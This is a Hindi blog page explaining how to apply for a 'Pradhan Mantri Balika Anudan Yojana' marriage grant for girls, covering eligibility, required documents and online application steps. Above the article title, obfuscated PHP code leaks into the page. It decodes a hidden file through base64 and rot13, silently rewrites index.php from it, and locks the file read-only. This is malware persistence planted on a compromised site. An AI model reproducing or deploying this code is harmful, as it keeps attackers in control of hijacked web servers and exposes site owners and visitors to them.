$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } बेटियों को मिलेंगे 50 हजार रुपये जाने कैसे, इस तरीके से करें आवेदन । Pradhan Mantri Balika Anudan Yojana – E-Sharm

बेटियों को मिलेंगे 50 हजार रुपये जाने कैसे, इस तरीके से करें आवेदन । Pradhan Mantri Balika Anudan Yojana

Sharing Is Caring:

Pradhan Mantri Balika Anudan Yojana :- दोस्तों आप लोगों को पता ही होगा हमारे समाज में बेटियों को आज भी बोझ समझा जाता है, बेटी के जन्म से ही उसके माता पिता को उसके शादी विवाह के लिए चिंता होने लगती है । दोस्तों बहुत से लोग गरीबी रेखा से नीचे अपना जीवन यापन करते हैं, और वे अपनी बेटियों की शादी नही कर पाते हैं उन्हें कोई आर्थिक मदद नही मिल पाती है । तो इसी सब को देखते हुए केंद्र सरकार ने इस योजना को शुरू किया गया है, भारत सरकार बालिका के परिवार को उसकी शादी विवाह के लिए वित्तीय मदद देगी और यह योजना लोगों की मानसिकता बदलने में कारागर साबित होगी, प्रधानमंत्री बालिका अनुदान योजना बलिकाओं के लिए ही शुरू की गई है ।

बेटियों को मिलेंगे 50 हजार रुपये जाने कैसे, इस तरीके से करें आवेदन

प्रधानमंत्री बालिका अनुदान योजना क्या है ?

दोस्तों प्रधानमंत्री बालिका अनुदान योजना केंद्र सरकार के द्वारा गरीबी रेखा से नीचे जीवन यापन करने वाली लड़कियों के लिए ही शुरू की गई है, इस योजना के जरिए बालिका की शादी विवाह के लिए 50 हजार रुपये तक की आर्थिक मदद केंद्र सरकार के द्वारा दिया जायेगा ।

प्रधानमंत्री बालिका अनुदान योजना की क्या पात्रता रखी गई है ?

प्रधानमंत्री बालिका अनुदान योजना की पात्रताओं की बात करें तो आवेदक कर्ता भारत का स्थायी मूल निवासी होना चाहिए, और आवेदक बालिका होनी चाहिए । नवजात बालिका का मृत्यु और जन्म पंजीकरण केंद्र में पंजीकृत होना जरूरी है तभी इस योजना का पात्र माना जायेगा । इस योजना में बालिका अपने माता पिता की पहली लड़की होनी चाहिए, और अगर माता पिता के एक से ज्यादा लड़कियां है तो लाभ सिर्फ पहली बालिका को ही इस योजना का पात्र होगी । तो ये सभी पात्रताएँ है जो इस योजना के अंतर्गत रखी गई है ।

प्रधानमंत्री बालिका अनुदान योजना के लिए जरूरी दस्तावेज ?

इस योजना की जरूरी दस्तावेजों की बात करें तो इसमे आवेदक कर्ता बालिका का आधार कार्ड, पैन कार्ड, जन्म प्रमाण पत्र, वोटर आईडी कार्ड, बैंक खाता पासबुक । तो ये सभी दस्तावेज है जो इस योजना के लिए चाहिए ।

* आधार कार्ड.
* पैन कार्ड.
* जन्म प्रमाण पत्र.
* वोटर आईडी कार्ड.
* बैंक खाता पासबुक.

प्रधानमंत्री बालिका अनुदान योजना का ऑनलाइन आवेदन कैसे करें ?

दोस्तों प्रधानमंत्री बालिका अनुदान योजना का ऑनलाइन आवेदन करने के लिए सबसे पहले आपको महिला एवं बाल विकास मंत्रालय की प्रधानमंत्री बालिका अनुदान योजना की ऑफिशियल वेबसाइट पर जाना होगा । उसके बाद आपको BAY ऑनलाइन आवेदन अनुभाग में जाना होगा, उसके बाद आपको अप्लाई नाउ पर क्लिक करना होगा । अब आपको सभी जानकारीयों को भरना होगा, जैसे – अंतिम नाम, माता पिता का नाम सभी अनुरोधित विवरणों के साथ और जरूरी दस्तावेजों को अपलोड करना होगा । उसके बाद आखिरी में आपको अपना आवेदन जमा करना होगा और आपको प्रिंट आउट निकाल लेना है ।

5 thoughts on “बेटियों को मिलेंगे 50 हजार रुपये जाने कैसे, इस तरीके से करें आवेदन । Pradhan Mantri Balika Anudan Yojana”

Leave a Comment

error: Content is protected !!